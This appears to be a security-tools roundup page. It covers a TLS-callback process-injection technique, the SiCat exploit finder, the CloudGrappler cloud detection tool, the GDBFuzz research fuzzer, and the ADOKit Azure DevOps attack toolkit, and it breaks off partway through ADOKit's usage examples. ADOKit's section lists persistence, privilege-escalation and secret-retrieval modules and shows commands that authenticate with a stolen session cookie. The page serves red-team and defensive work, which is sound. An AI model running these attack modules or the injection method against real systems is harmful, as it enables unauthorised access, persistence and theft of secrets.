RemoteTLSCallbackInjection - Utilizing TLS Callbacks To Execute A Payload Without Spawning Any Threads In A Remote Process

This method utilizes TLS callbacks to execute aย payloadย without spawning any threads in a remote process. This method is inspired byย Threadless Injectionย as RemoteTLSCallbackInjection does not invoke any API calls to trigger the injectedย payload.

Quick Links

Maldev Academy Home

Maldev Academy Syllabus

Related Maldev Academy Modules

New Module 34: TLS Callbacks For Anti-Debugging

New Module 35: Threadless Injection

Implementation Steps

The PoC follows these steps:

  1. Create a suspended process using the CreateProcessViaWinAPIsW function (i.e. RuntimeBroker.exe).
  2. Fetch the remote process image base address followed by reading the process's PE headers.
  3. Fetch an address to a TLS callback function.
  4. Patch a fixed shellcode (i.e. g_FixedShellcode) with runtime-retrieved values. This shellcode is responsible for restoring both original bytes and memory permission of the TLS callback function's address.
  5. Inject both shellcodes: g_FixedShellcode and the main payload.
  6. Patch the TLS callback function's address and replace it with the address of our injected payload.
  7. Resume process.

The g_FixedShellcode shellcode will then make sure that the main payload executes only once by restoring the original TLS callback's original address before calling the main payload. A TLS callback can execute multiple times across the lifespan of a process, therefore it is important to control the number of times the payload is triggered by restoring the original code path execution to the original TLS callback function.


The following image shows our implementation, RemoteTLSCallbackInjection.exe, spawning a cmd.exe as its main payload.

Sicat - The Useful Exploit Finder


SiCat is an advanced exploit search tool designed to identify and gather information about exploits from both open sources and local repositories effectively. With a focus on cybersecurity, SiCat allows users to quickly search online, finding potential vulnerabilities and relevant exploits for ongoing projects or systems.

SiCat's main strength lies in its ability to traverse both online and local resources to collect information about relevant exploitations. This tool aids cybersecurity professionals and researchers in understanding potential security risks, providing valuable insights to enhance system security.

SiCat Resources


git clone https://github.com/justakazh/sicat.git && cd sicat

pip install -r requirements.txt


~$ python sicat.py --help

Command Line Options:

Command Description
-h Show help message and exit
-nm Identify via nmap output
--nvd Use NVD as info source
--packetstorm Use PacketStorm as info source
--exploitdb Use ExploitDB as info source
--exploitalert Use ExploitAlert as info source
--msfmoduke Use metasploit as info source
-o OUTPUT Path to save output to
-ot OUTPUT_TYPE Output file type: json or html


From keyword

python sicat.py -k telerik --exploitdb --msfmodule

From nmap output

nmap --open -sV localhost -oX nmap_out.xml
python sicat.py -nm nmap_out.xml --packetstorm


  • [ ] Input from nmap result from pipeline
  • [ ] Nmap multiple host support
  • [ ] Search NSE Script
  • [ ] Search by PORT


I'm aware that perfection is elusive in coding. If you come across any bugs, feel free to contribute by fixing the code or suggesting new features. Your input is always welcomed and valued.

CloudGrappler - A purpose-built tool designed for effortless querying of high-fidelity and single-event detections related to well-known threat actors in popular cloud environments such as AWS and Azure

Permiso: https://permiso.io
Read our release blog: https://permiso.io/blog/cloudgrappler-a-powerful-open-source-threat-detection-tool-for-cloud-environments

CloudGrappler is a purpose-built tool designed for effortless querying of high-fidelity and single-event detections related to well-known threat actors in popular cloud environments such as AWS and Azure.


To optimize your utilization of CloudGrappler, we recommend using shorter time ranges when querying for results. This approach enhances efficiency and accelerates the retrieval of information, ensuring a more seamless experience with the tool.

Required Packages

bash pip3 install -r requirements.txt

Cloning cloudgrep locally

To clone the cloudgrep repository locally, run the clone.sh file. Alternatively, you can manually clone the repository into the same directory where CloudGrappler was cloned.

bash chmod +x clone.sh ./clone.sh


This tool offers a CLI (Command Line Interface). As such, here we review its use:

Example 1 - Running the tool with default queries file

Define the scanning scope inside data_sources.json file based on your cloud infrastructure configuration. The following example showcases a structured data_sources.json file for both AWS and Azure environments:


Modifying the source inside the queries.json file to a wildcard character (*) will scan the corresponding query across both AWS and Azure environments.

"AWS": [
"bucket": "cloudtrail-logs-00000000-ffffff",
"prefix": [
"bucket": "aws-kosova-us-east-1-00000000"

"AZURE": [
"accountname": "logs",
"container": [

Run command

python3 main.py

Example 2 - Permiso Intel Use Case

python3 main.py -p

[+] Running GetFileDownloadUrls.*secrets_ for AWS 
[+] Threat Actor: LUCR3
[+] Severity: MEDIUM
[+] Description: Review use of CloudShell. Permiso seldom witnesses use of CloudShell outside of known attackers.This however may be a part of your normal business use case.

Example 3 - Generate report

python3 main.py -p -jo

โ””โ”€โ”€ json
โ”œโ”€โ”€ AWS
โ”‚ย ย  โ””โ”€โ”€ 2024-03-04 01:01 AM
โ”‚ย ย  โ””โ”€โ”€ cloudtrail-logs-00000000-ffffff--
โ”‚ย ย  โ””โ”€โ”€ testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03
โ”‚ย ย  โ””โ”€โ”€ GetFileDownloadUrls.*secrets_.json
โ””โ”€โ”€ AZURE
โ””โ”€โ”€ 2024-03-04 01:01 AM
โ””โ”€โ”€ logs
โ””โ”€โ”€ cloudgrappler
โ””โ”€โ”€ okta_key.json

Example 4 - Filtering logs based on date or time

python3 main.py -p -sd 2024-02-15 -ed 2024-02-16

Example 5 - Manually adding queries and data source types

python3 main.py -q "GetFileDownloadUrls.*secret", "UpdateAccessKey" -s '*'

Example 6 - Running the tool with your own queries file

python3 main.py -f new_file.json

Running in your Cloud and Authentication cloudgrep


Your system will need access to the S3 bucket. For example, if you are running on your laptop, you will need to configure the AWS CLI. If you are running on an EC2, an Instance Profile is likely the best choice.

If you run on an EC2 instance in the same region as the S3 bucket with a VPC endpoint for S3 you can avoid egress charges. You can authenticate in a number of ways.


The simplest way to authenticate with Azure is to first run:

az login

This will open a browser window and prompt you to login to Azure.

GDBFuzz - Fuzzing Embedded Systems Using Hardware Breakpoints

This is the companion code for the paper: 'Fuzzing Embedded Systems using Debugger Interfaces'. A preprint of the paper can be found here https://publications.cispa.saarland/3950/. The code allows the users to reproduce and extend the results reported in the paper. Please cite the above paper when reporting, reproducing or extending the results.

Folder structure

โ”œโ”€โ”€ benchmark # Scripts to build Google's fuzzer test suite and run experiments
โ”œโ”€โ”€ dependencies # Contains a Makefile to install dependencies for GDBFuzz
โ”œโ”€โ”€ evaluation # Raw exeriment data, presented in the paper
โ”œโ”€โ”€ example_firmware # Embedded example applications, used for the evaluation
โ”œโ”€โ”€ example_programs # Contains a compiled example program and configs to test GDBFuzz
โ”œโ”€โ”€ src # Contains the implementation of GDBFuzz
โ”œโ”€โ”€ Dockerfile # For creating a Docker image with all GDBFuzz dependencies installed
โ”œโ”€โ”€ LICENSE # License
โ”œโ”€โ”€ Makefile # Makefile for creating the docker image or install GDBFuzz locally
โ””โ”€โ”€ README.md # This README file

Purpose of the project

The idea of GDBFuzz is to leverage hardware breakpoints from microcontrollers as feedback for coverage-guided fuzzing. Therefore, GDB is used as a generic interface to enable broad applicability. For binary analysis of the firmware, Ghidra is used. The code contains a benchmark setup for evaluating the method. Additionally, example firmware files are included.

Getting Started

GDBFuzz enables coverage-guided fuzzing for embedded systems, but - for evaluation purposes - can also fuzz arbitrary user applications. For fuzzing on microcontrollers we recommend a local installation of GDBFuzz to be able to send fuzz data to the device under test flawlessly.

Install local

GDBFuzz has been tested on Ubuntu 20.04 LTS and Raspberry Pie OS 32-bit. Prerequisites are java and python3. First, create a new virtual environment and install all dependencies.

virtualenv .venv
source .venv/bin/activate
chmod a+x ./src/GDBFuzz/main.py

Run locally on an example program

GDBFuzz reads settings from a config file with the following keys.

# Path to the binary file of the SUT.
# This can, for example, be an .elf file or a .bin file.
binary_file_path = <path>

# Address of the root node of the CFG.
# Breakpoints are placed at nodes of this CFG.
# e.g. 'LLVMFuzzerTestOneInput' or 'main'
entrypoint = <entrypoint>

# Number of inputs that must be executed without a breakpoint hit until
# breakpoints are rotated.
until_rotate_breakpoints = <number>

# Maximum number of breakpoints that can be placed at any given time.
max_breakpoints = <number>

# Blacklist functions that shall be ignored.
# ignore_functions is a space separated list of function names e.g. 'malloc free'.
ignore_functions = <space separated list>

# One of {Hardware, QEMU, SUTRunsOnHost}
# Hardware: An external component starts a gdb server and GDBFuzz can connect to this gdb server.
# QEMU: GDBFuzz starts QEMU. QEMU emulates binary_file_path and starts gdbserver.
# SUTRunsOnHost: GDBFuzz start the target program within GDB.
target_mode = <mode>

# Set this to False if you want to start ghidra, analyze the SUT,
# and start the ghidra bridge server manually.
start_ghidra = True

# Space separated list of addresses where software breakpoints (for error
# handling code) are set. Execution of those is considered a crash.
# Example: software_breakpoint_addresses = 0x123 0x432
software_breakpoint_addresses =

# Whether all triggered software breakpoints are considered as crash
consider_sw_breakpoint_as_error = False

# The class 'SUT_connection_class' in file 'SUT_connection_path' implements
# how inputs are sent to the SUT.
# Inputs can, for example, be sent over Wi-Fi, Serial, Bluetooth, ...
# This class must inherit from ./connections/SUTConnection.py.
# See ./connections/SUTConnection.py for more information.
SUT_connection_file = FIFOConnection.py

path_to_gdb = gdb-multiarch
#Written in address:port
gdb_server_address = localhost:4242

# In Bytes
maximum_input_length = 100000
# In seconds
single_run_timeout = 20
# In seconds
total_runtime = 3600

# Optional
# Path to a directory where each file contains one seed. If you don't want to
# use seeds, leave the value empty.
seeds_directory =

# Strategies to choose basic blocks are located in
# 'src/GDBFuzz/breakpoint_strategies/'
# For the paper we use the following strategies
# 'RandomBasicBlockStrategy.py' - Randomly choosing unreached basic blocks
# 'RandomBasicBlockNoDomStrategy.py' - Like previous, but doesn't use dominance relations to derive transitively reached nodes.
# 'RandomBasicBlockNoCorpusStrategy.py' - Like first, but prevents growing the input corpus and therefore behaves like blackbox fuzzing with coverage measurement.
# 'BlackboxStrategy.py', - Doesn't set any breakpoints
breakpoint_strategy_file = RandomBasicBlockStrategy.py

path_to_qemu = dependencies/qemu/build/x86_64-linux-user/qemu-x86_64
path_to_ghidra = dependencies/ghidra

loglevel = INFO

# Path to a directory where output files (e.g. graphs, logfiles) are stored.
output_directory = ./output

# If set to True, an MQTT client sends UI elements (e.g. graphs)
enable_UI = False

An example config file is located in ./example_programs/ together with an example program that was compiled using our fuzzing harness in benchmark/benchSUTs/GDBFuzz_wrapper/common/. Start fuzzing for one hour with the following command.

chmod a+x ./example_programs/json-2017-02-12
./src/GDBFuzz/main.py --config ./example_programs/fuzz_json.cfg

We first see output from Ghidra analyzing the binary executable and susequently messages when breakpoints are relocated or hit.

Fuzzing Output

Depending on the specified output_directory in the config file, there should now be a folder trial-0 with the following structure

โ”œโ”€โ”€ corpus # A folder that contains the input corpus.
โ”œโ”€โ”€ crashes # A folder that contains crashing inputs - if any.
โ”œโ”€โ”€ cfg # The control flow graph as adjacency list.
โ”œโ”€โ”€ fuzzer_stats # Statistics of the fuzzing campaign.
โ”œโ”€โ”€ plot_data # Table showing at which relative time in the fuzzing campaign which basic block was reached.
โ”œโ”€โ”€ reverse_cfg # The reverse control flow graph.

Using Ghidra in GUI mode

By setting start_ghidra = False in the config file, GDBFuzz connects to a Ghidra instance running in GUI mode. Therefore, the ghidra_bridge plugin needs to be started manually from the script manager. During fuzzing, reached program blocks are highlighted in green.

GDBFuzz on Linux user programs

For fuzzing on Linux user applications, GDBFuzz leverages the standard LLVMFuzzOneInput entrypoint that is used by almost all fuzzers like AFL, AFL++, libFuzzer,.... In benchmark/benchSUTs/GDBFuzz_wrapper/common There is a wrapper that can be used to compile any compliant fuzz harness into a standalone program that fetches input via a named pipe at /tmp/fromGDBFuzz. This allows to simulate an embedded device that consumes data via a well defined input interface and therefore run GDBFuzz on any application. For convenience we created a script in benchmark/benchSUTs that compiles all programs from our evaluation with our wrapper as explained later.

NOTE: GDBFuzz is not intended to fuzz Linux user applications. Use AFL++ or other fuzzers therefore. The wrapper just exists for evaluation purposes to enable running benchmarks and comparisons on a scale!

Install and run in a Docker container

The general effectiveness of our approach is shown in a large scale benchmark deployed as docker containers.

make dockerimage

To run the above experiment in the docker container (for one hour as specified in the config file), map the example_programsand output folder as volumes and start GDBFuzz as follows.

chmod a+x ./example_programs/json-2017-02-12
docker run -it --env CONFIG_FILE=/example_programs/fuzz_json_docker_qemu.cfg -v $(pwd)/example_programs:/example_programs -v $(pwd)/output:/output gdbfuzz:1.0

An output folder should appear in the current working directory with the structure explained above.

Detailed Instructions

Our evaluation is split in two parts. 1. GDBFuzz on its intended setup, directly on the hardware. 2. GDBFuzz in an emulated environment to allow independend analysis and comparisons of the results.

GDBFuzz can work with any GDB server and therefore most debug probes for microcontrollers.

GDBFuzz vs. Blackbox (RQ1)

Regarding RQ1 from the paper, we execute GDBFuzz on different microcontrollers with different firmwares located in example_firmware. For each experiment we run GDBFuzz with the RandomBasicBlock and with the RandomBasicBlockNoCorpus strategy. The latter behaves like fuzzing without feedback, but we can still measure the achieved coverage. For answering RQ1, we compare the achieved coverage of the RandomBasicBlock and the RandomBasicBlockNoCorpus strategy. Respective config files are in the corresponding subfolders and we now explain how to setup fuzzing on the four development boards.

GDBFuzz on STM32 B-L4S5I-IOT01A board

GDBFuzz requires access to a GDB Server. In this case the B-L4S5I-IOT01A and its on-board debugger are used. This on-board debugger sets up a GDB server via the 'st-util' program, and enables access to this GDB server via localhost:4242.

  • Install the STLINK driver link
  • Connect MCU board and PC via USB (on MCU board, connect to the USB connector that is labeled as 'USB STLINK')
sudo apt-get install stlink-tools gdb-multiarch

Build and flash a firmware for the STM32 B-L4S5I-IOT01A, for example the arduinojson project.

Prerequisite: Install platformio (pio)

cd ./example_firmware/stm32_disco_arduinojson/
pio run --target upload

For your info: platformio stored an .elf file of the SUT here: ./example_firmware/stm32_disco_arduinojson/.pio/build/disco_l4s5i_iot01a/firmware.elf This .elf file is also later used in the user configuration for Ghidra.

Start a new terminal, and run the following to start the a GDB Server:


Run GDBFuzz with a user configuration for arduinojson. We can send data over the usb port to the microcontroller. The microcontroller forwards this data via serial to the SUT'. In our case /dev/ttyACM0 is the USB device to the microcontroller board. If your system assigned another device to the microcontroller board, change /dev/ttyACM0 in the config file to your device.

./src/GDBFuzz/main.py --config ./example_firmware/stm32_disco_arduinojson/fuzz_serial_json.cfg

Fuzzer statistics and logs are in the ./output/... directory.

GDBFuzz on the CY8CKIT-062-WiFi-BT board

Install pyocd:

pip install --upgrade pip 'mbed-ls>=1.7.1' 'pyocd>=0.16'

Make sure that 'KitProg v3' is on the device and put Board into 'Arm DAPLink' Mode by pressing the appropriate button. Start the GDB server:

pyocd gdbserver --persist

Flash a firmware and start fuzzing e.g. with

target remote :3333
load ./example_firmware/CY8CKIT_json/mtb-example-psoc6-uart-transmit-receive.elf
monitor reset
./src/GDBFuzz/main.py --config ./example_firmware/CY8CKIT_json/fuzz_serial_json.cfg

GDBFuzz on ESP32 and Segger J-Link

Build and flash a firmware for the ESP32, for instance the arduinojson example with platformio.

cd ./example_firmware/esp32_arduinojson/
pio run --target upload

Add following line to the openocd config file for the J-Link debugger: jlink.cfg

adapter speed 10000

Start a new terminal, and run the following to start the GDB Server:

openocd -f interface/jlink.cfg -f target/esp32.cfg -c "telnet_port 7777" -c "gdb_port 8888"

Run GDBFuzz with a user configuration for arduinojson. We can send data over the usb port to the microcontroller. The microcontroller forwards this data via serial to the SUT'. In our case /dev/ttyUSB0 is the USB device to the microcontroller board. If your system assigned another device to the microcontroller board, change /dev/ttyUSB0 in the config file to your device.

./src/GDBFuzz/main.py --config ./example_firmware/esp32_arduinojson/fuzz_serial.cfg

Fuzzer statistics and logs are in the ./output/... directory.

GDBFuzz on MSP430F5529LP

Install TI MSP430 GCC from https://www.ti.com/tool/MSP430-GCC-OPENSOURCE

Start GDB Server

./gdb_agent_console libmsp430.so

or (more stable). Build mspdebug from https://github.com/dlbeer/mspdebug/ and use:

until mspdebug --fet-skip-close --force-reset tilib "opt gdb_loop True" gdb ; do sleep 1 ; done

Ghidra fails to analyze binaries for the TI MSP430 controller out of the box. To fix that, we import the file in the Ghidra GUI, choose MSP430X as architecture and skip the auto analysis. Next, we open the 'Symbol Table', sort them by name and delete all symbols with names like $C$L*. Now the auto analysis can be executed. After analysis, start the ghidra bridge from the Ghidra GUI manually and then start GDBFuzz.

./src/GDBFuzz/main.py --config ./example_firmware/msp430_arduinojson/fuzz_serial.cfg

USB Fuzzing

To access USB devices as non-root user with pyusb we add appropriate rules to udev. Paste following lines to /etc/udev/rules.d/50-myusb.rules:

SUBSYSTEM=="usb", ATTRS{idVendor}=="1234", ATTRS{idProduct}=="5678" GROUP="usbusers", MODE="666"

Reload udev:

sudo udevadm control --reload
sudo udevadm trigger

Compare against Fuzzware (RQ2)

In RQ2 from the paper, we compare GDBFuzz against the emulation based approach Fuzzware. First we execute GDBFuzz and Fuzzware as described previously on the shipped firmware files. For each GDBFuzz experiment, we create a file with valid basic blocks from the control flow graph files as follows:

cut -d " " -f1 ./cfg > valid_bbs.txt

Now we can replay coverage against fuzzware result fuzzware genstats --valid-bb-file valid_bbs.txt

Finding Bugs (RQ3)

When crashing or hanging inputs are found, the are stored in the crashes folder. During evaluation, we found the following three bugs:

  1. An infinite loop in the STM32 USB device stack, caused by counting a uint8_t index variable to an attacker controllable uint32_t variable within a for loop.
  2. A buffer overflow in the Cypress JSON parser, caused by missing length checks on a fixed size internal buffer.
  3. A null pointer dereference in the Cypress JSON parser, caused by missing validation checks.

GDBFuzz on an Raspberry Pi 4a (8Gb)

GDBFuzz can also run on a Raspberry Pi host with slight modifications:

  1. Ghidra must be modified, such that it runs on an 32-Bit OS

In file ./dependencies/ghidra/support/launch.sh:125 The JAVA_HOME variable must be hardcoded therefore e.g. to JAVA_HOME="/usr/lib/jvm/default-java"

  1. STLink must be at version >= 1.7 to work properly -> Build from sources

GDBFuzz on other boards

To fuzz software on other boards, GDBFuzz requires

  1. A microcontroller with hardware breakpoints and a GDB compliant debug probe
  2. The firmware file.
  3. A running GDBServer and suitable GDB application.
  4. An entry point, where fuzzing should start e.g. a parser function or an address
  5. An input interface (see src/GDBFuzz/connections) that triggers execution of the code at the entry point e.g. serial connection

All these properties need to be specified in the config file.

Run the full Benchmark (RQ4 - 8)

For RQ's 4 - 8 we run a large scale benchmark. First, build the Docker image as described previously and compile applications from Google's Fuzzer Test Suite with our fuzzing harness in benchmark/benchSUTs/GDBFuzz_wrapper/common.

cd ./benchmark/benchSUTs
chmod a+x setup_benchmark_SUTs.py
make dockerbenchmarkimage

Next adopt the benchmark settings in benchmark/scripts/benchmark.py and benchmark/scripts/benchmark_aflpp.py to your demands (especially number_of_cores, trials, and seconds_per_trial) and start the benchmark with:

cd ./benchmark/scripts
./benchmark.py $(pwd)/../benchSUTs/SUTs/ SUTs.json
./benchmark_aflpp.py $(pwd)/../benchSUTs/SUTs/ SUTs.json

A folder appears in ./benchmark/scripts that contains plot files (coverage over time), fuzzer statistic files, and control flow graph files for each experiment as in evaluation/fuzzer_test_suite_qemu_runs.

[Optional] Install Visualization and Visualization Example

GDBFuzz has an optional feature where it plots the control flow graph of covered nodes. This is disabled by default. You can enable it by following the instructions of this section and setting 'enable_UI' to 'True' in the user configuration.

On the host:


sudo apt-get install graphviz

Install a recent version of node, for example Option 2 from here. Use Option 2 and not option 1. This should install both node and npm. For reference, our version numbers are (but newer versions should work too):

โžœ node --version
โžœ npm --version

Install web UI dependencies:

cd ./src/webui
npm install

Install mosquitto MQTT broker, e.g. see here

Update the mosquitto broker config: Replace the file /etc/mosquitto/conf.d/mosquitto.conf with the following content:

listener 1883
allow_anonymous true

listener 9001
protocol websockets

Restart the mosquitto broker:

sudo service mosquitto restart

Check that the mosquitto broker is running:

sudo service mosquitto status

The output should include the text 'Active: active (running)'

Start the web UI:

cd ./src/webui
npm start

Your web browser should open automatically on 'http://localhost:3000/'.

Start GDBFuzz and use a user config file where enable_UI is set to True. You can use the Docker container and arduinojson SUT from above. But make sure to set 'enable_UI' to 'True'.

The nodes covered in 'blue' are covered. White nodes are not covered. We only show uncovered nodes if their parent is covered (drawing the complete control flow graph takes too much time if the control flow graph is large).

ADOKit - Azure DevOps Services Attack Toolkit

Azure DevOps Services Attack Toolkit - ADOKit is a toolkit that can be used to attack Azure DevOps Services by taking advantage of the available REST API. The tool allows the user to specify an attack module, along with specifying valid credentials (API key or stolen authentication cookie) for the respective Azure DevOps Services instance. The attack modules supported include reconnaissance, privilege escalation and persistence. ADOKit was built in a modular approach, so that new modules can be added in the future by the information security community.

Full details on the techniques used by ADOKit are in the X-Force Red whitepaper.


Libraries Used

The below 3rd party libraries are used in this project.

Library URL License
Fody https://github.com/Fody/Fody MIT License
Newtonsoft.Json https://github.com/JamesNK/Newtonsoft.Json MIT License


  • Use the pre-compiled binary in Releases

Building Yourself

Take the below steps to setup Visual Studio in order to compile the project yourself. This requires two .NET libraries that can be installed from the NuGet package manager.

  • Load the Visual Studio project up and go to "Tools" --> "NuGet Package Manager" --> "Package Manager Settings"
  • Go to "NuGet Package Manager" --> "Package Sources"
  • Add a package source with the URL https://api.nuget.org/v3/index.json
  • Install the Costura.Fody NuGet package.
  • Install-Package Costura.Fody -Version 3.3.3
  • Install the Newtonsoft.Json package
  • Install-Package Newtonsoft.Json
  • You can now build the project yourself!

Command Modules

  • Recon
  • check - Check whether organization uses Azure DevOps and if credentials are valid
  • whoami - List the current user and its group memberships
  • listrepo - List all repositories
  • searchrepo - Search for given repository
  • listproject - List all projects
  • searchproject - Search for given project
  • searchcode - Search for code containing a search term
  • searchfile - Search for file based on a search term
  • listuser - List users
  • searchuser - Search for a given user
  • listgroup - List groups
  • searchgroup - Search for a given group
  • getgroupmembers - List all group members for a given group
  • getpermissions - Get the permissions for who has access to a given project
  • Persistence
  • createpat - Create personal access token for user
  • listpat - List personal access tokens for user
  • removepat - Remove personal access token for user
  • createsshkey - Create public SSH key for user
  • listsshkey - List public SSH keys for user
  • removesshkey - Remove public SSH key for user
  • Privilege Escalation
  • addprojectadmin - Add a user to the "Project Administrators" for a given project
  • removeprojectadmin - Remove a user from the "Project Administrators" group for a given project
  • addbuildadmin - Add a user to the "Build Administrators" group for a given project
  • removebuildadmin - Remove a user from the "Build Administrators" group for a given project
  • addcollectionadmin - Add a user to the "Project Collection Administrators" group
  • removecollectionadmin - Remove a user from the "Project Collection Administrators" group
  • addcollectionbuildadmin - Add a user to the "Project Collection Build Administrators" group
  • removecollectionbuildadmin - Remove a user from the "Project Collection Build Administrators" group
  • addcollectionbuildsvc - Add a user to the "Project Collection Build Service Accounts" group
  • removecollectionbuildsvc - Remove a user from the "Project Collection Build Service Accounts" group
  • addcollectionsvc - Add a user to the "Project Collection Service Accounts" group
  • removecollectionsvc - Remove a user from the "Project Collection Service Accounts" group
  • getpipelinevars - Retrieve any pipeline variables used for a given project.
  • getpipelinesecrets - Retrieve the names of any pipeline secrets used for a given project.
  • getserviceconnections - Retrieve the service connections used for a given project.


  • /credential: - credential for authentication (PAT or Cookie). Applicable to all modules.
  • /url: - Azure DevOps URL. Applicable to all modules.
  • /search: - Keyword to search for. Not applicable to all modules.
  • /project: - Project to perform an action for. Not applicable to all modules.
  • /user: - Perform an action against a specific user. Not applicable to all modules.
  • /id: - Used with persistence modules to perform an action against a specific token ID. Not applicable to all modules.
  • /group: - Perform an action against a specific group. Not applicable to all modules.

Authentication Options

Below are the authentication options you have with ADOKit when authenticating to an Azure DevOps instance.

  • Stolen Cookie - This will be the UserAuthentication cookie on a user's machine for the .dev.azure.com domain.
  • /credential:UserAuthentication=ABC123
  • Personal Access Token (PAT) - This will be an access token/API key that will be a single string.
  • /credential:apiToken

Module Details Table

The below table shows the permissions required for each module.

Attack Scenario Module Special Permissions? Notes
Recon check No
Recon whoami No
Recon listrepo No
Recon searchrepo No
Recon listproject No
Recon searchproject No
Recon searchcode No
Recon searchfile No
Recon listuser No
Recon searchuser No
Recon listgroup No
Recon searchgroup No
Recon getgroupmembers No
Recon getpermissions No
Persistence createpat No
Persistence listpat No
Persistence removepat No
Persistence createsshkey No
Persistence listsshkey No
Persistence removesshkey No
Privilege Escalation addprojectadmin Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation removeprojectadmin Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation addbuildadmin Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation removebuildadmin Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation addcollectionadmin Yes - Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation removecollectionadmin Yes - Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation addcollectionbuildadmin Yes - Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation removecollectionbuildadmin Yes - Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation addcollectionbuildsvc Yes - Project Collection Administrator, Project Colection Build Administrators or Project Collection Service Accounts
Privilege Escalation removecollectionbuildsvc Yes - Project Collection Administrator, Project Colection Build Administrators or Project Collection Service Accounts
Privilege Escalation addcollectionsvc Yes - Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation removecollectionsvc Yes - Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation getpipelinevars Yes - Contributors or Readers or Build Administrators or Project Administrators or Project Team Member or Project Collection Test Service Accounts or Project Collection Build Service Accounts or Project Collection Build Administrators or Project Collection Service Accounts or Project Collection Administrators
Privilege Escalation getpipelinesecrets Yes - Contributors or Readers or Build Administrators or Project Administrators or Project Team Member or Project Collection Test Service Accounts or Project Collection Build Service Accounts or Project Collection Build Administrators or Project Collection Service Accounts or Project Collection Administrators
Privilege Escalation getserviceconnections Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts


Validate Azure DevOps Access

Use Case

Perform authentication check to ensure that organization is using Azure DevOps and that provided credentials are valid.


Provide the check module, along with any relevant authentication information and URL. This will output whether the organization provided is using Azure DevOps, and if so, will attempt to validate the credentials provided.

ADOKit.exe check /credential:apiKey /url:https://dev.azure.com/organizationName

ADOKit.exe check /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

Example Output

C:\>ADOKit.exe check /credential:apiKey /url:https://dev.azure.com/YourOrganization

Module: check
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 3/28/2023 3:33:01 PM

[*] INFO: Checking if organization provided uses Azure DevOps

[+] SUCCESS: Organization provided exists in Azure DevOps

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

3/28/23 19:33:02 Finished execution of check


Use Case

Get the current user and the user's group memberhips


Provide the whoami module, along with any relevant authentication information and URL. This will output the current user and all of its group memberhips.

ADOKit.exe whoami /credential:apiKey /url:https://dev.azure.com/organizationName

ADOKit.exe whoami /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

Example Output

C:\>ADOKit.exe whoami /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization

Module: whoami
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 11:33:12 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Username | Display Name | UPN
jsmith | John Smith | [email protected]. com

[*] INFO: Listing group memberships for the current user

Group UPN | Display Name | Description
[YourOrganization]\Project Collection Test Service Accounts | Project Collection Test Service Accounts | Members of this group should include the service accounts used by the test controllers set up for this project collection.
[TestProject2]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[MaraudersMap]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[YourOrganization]\Project Collection Administrators | Project Collection Administrators | Members of this application group can perform all privileged operations on the Team Project Collection.

4/4/23 15:33:19 Finished execution of whoami

List Repos

Use Case

Discover repositories being used in Azure DevOps instance


Provide the listrepo module, along with any relevant authentication information and URL. This will output the repository name and URL.

ADOKit.exe listrepo /credential:apiKey /url:https://dev.azure.com/organizationName

ADOKit.exe listrepo /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

Example Output

C:\>ADOKit.exe listrepo /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization

Module: listrepo
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 3/29/2023 8:41:50 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Name | URL
TestProject2 | https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2
MaraudersMap | https://dev.azure.com/YourOrganization/MaraudersMap/_git/MaraudersMap
SomeOtherRepo | https://dev.azure.com/YourOrganization/Projec tWithMultipleRepos/_git/SomeOtherRepo
AnotherRepo | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/AnotherRepo
ProjectWithMultipleRepos | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/ProjectWithMultipleRepos
TestProject | https://dev.azure.com/YourOrganization/TestProject/_git/TestProject

3/29/23 12:41:53 Finished execution of listrepo

Search Repos

Use Case

Search for repositories by repository name in Azure DevOps instance


Provide the searchrepo module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the matching repository name and URL.

ADOKit.exe searchrepo /credential:apiKey /url:https://dev.azure.com/organizationName /search:cred

ADOKit.exe searchrepo /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:cred

Example Output

C:\>ADOKit.exe searchrepo /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"test"

Module: searchrepo
Auth Type: API Key
Search Term: test
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 3/29/2023 9:26:57 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Name | URL
TestProject2 | https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2
TestProject | https://dev.azure.com/YourOrganization/TestProject/_git/TestProject

3/29/23 13:26:59 Finished execution of searchrepo

List Projects

Use Case

Discover projects being used in Azure DevOps instance


Provide the listproject module, along with any relevant authentication information and URL. This will output the project name, visibility (public or private) and URL.

ADOKit.exe listproject /credential:apiKey /url:https://dev.azure.com/organizationName

ADOKit.exe listproject /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

Example Output

C:\>ADOKit.exe listproject /credential:apiKey /url:https://dev.azure.com/YourOrganization

Module: listproject
